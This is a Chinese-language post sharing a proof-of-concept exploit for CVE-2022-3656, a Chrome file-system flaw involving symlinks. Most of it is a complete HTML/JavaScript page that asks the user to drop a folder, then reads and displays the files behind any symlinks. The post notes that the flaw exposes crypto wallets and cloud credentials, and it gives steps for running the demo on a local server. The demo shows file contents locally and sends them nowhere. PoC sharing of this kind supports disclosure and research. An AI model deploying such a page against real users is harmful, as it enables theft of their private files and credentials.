【CVE-2022-3656】Google Chrome 输入验证错误漏洞

项目地址

https://github.com/momika233/CVE-2022-3656

漏洞分析

Google Chrome是美国谷歌（Google）公司的一款Web浏览器。

Google Chrome存在输入验证错误漏洞，该漏洞源于File System中的数据验证不足。

POC DEMO

基础版

index.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        * {
            box-sizing: border-box;
        }

        html,
        body {
            margin: 0;
            padding: 0;
            overflow: hidden;
            text-align: center;
            -webkit-font-smoothing: antialiased;
            font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        }

        .dropzone {
            border: 3px dashed #3e3e3e;
            display: flex;
            justify-content: center;
            align-items: center;
            font-weight: bold;
            height: 80vh;
            text-transform: uppercase;
            position: fixed;
            top: 50%;
            left: 50%;
            width: 80%;
            transform: translate(-50%, -50%);
        }

        .dropzone input {
            top: 0;
            left: 0;
            opacity: 0;
            display: block;
            position: fixed;
            transform: scale(1000);
        }

        button {
            display: block;
            margin-bottom: 10px;
        }
    </style>
</head>

<body>
    <div class="dropzone">
        Drop folder with symlinks here
        <input onChange="handleFiles(event)" webkitdirectory multiple onClick="handleClick(event)" title=""
            type="file" />
    </div>

    <script>
        const dropzone = document.querySelector(".dropzone");

        function handleFiles(event) {
            document.body.innerHTML = '';
            files = Array.from(event.target.files).filter(f => f.size > 0);
            for (let file of files) {
                let name = file.name;
                let label = document.createElement("button");
                label.innerText = name;
                label.addEventListener('click', async () => {
                    const reader = new FileReader();
                    reader.onload = async () => {
                        alert(reader.result);
                    }
                    reader.onerror = console.error;
                    reader.readAsText(file);
                });
                document.body.appendChild(label);
            }
        }

        function handleClick(event) {
            event.preventDefault();
            alert("Drag and drop a folder with symlinks here");
        }

        document.addEventListener("drop", function (event) {
            dropzone.classList.remove("hover");
        }, false);

        document.addEventListener("dragleave", function (event) {
            event.preventDefault();
            dropzone.classList.remove("hover");
        }, false);

        document.addEventListener("dragover", function (event) {
            event.preventDefault();
            dropzone.classList.add("hover");
        }, false);
    </script>
</body>

</html>

豪华版

https://github.com/momika233/CVE-2022-3656/tree/main/CVE-2022-3656-poc/fancy-demo

漏洞细节

Imperva Red Team最近披露了一个名为CVE-2022-3656的漏洞，该漏洞影响了超过25亿的谷歌浏览器和基于Chromium的浏览器用户。

该漏洞允许窃取敏感文件，如加密钱包和云提供商凭证。

漏洞规范

1.https://bugs.chromium.org/p/chromium/issues/detail?id=1345275#c34

2.https://www.imperva.com/blog/google-chrome-symstealer-vulnerability/

使用说明

下载poc.zip文件并解压

导入到 "fancy-poc"，并启动服务器（python3 -m http.server）

打开http://localhost:8000，并按照PoC说明进行操作

 

标签：工具分享, 漏洞分享, POC脚本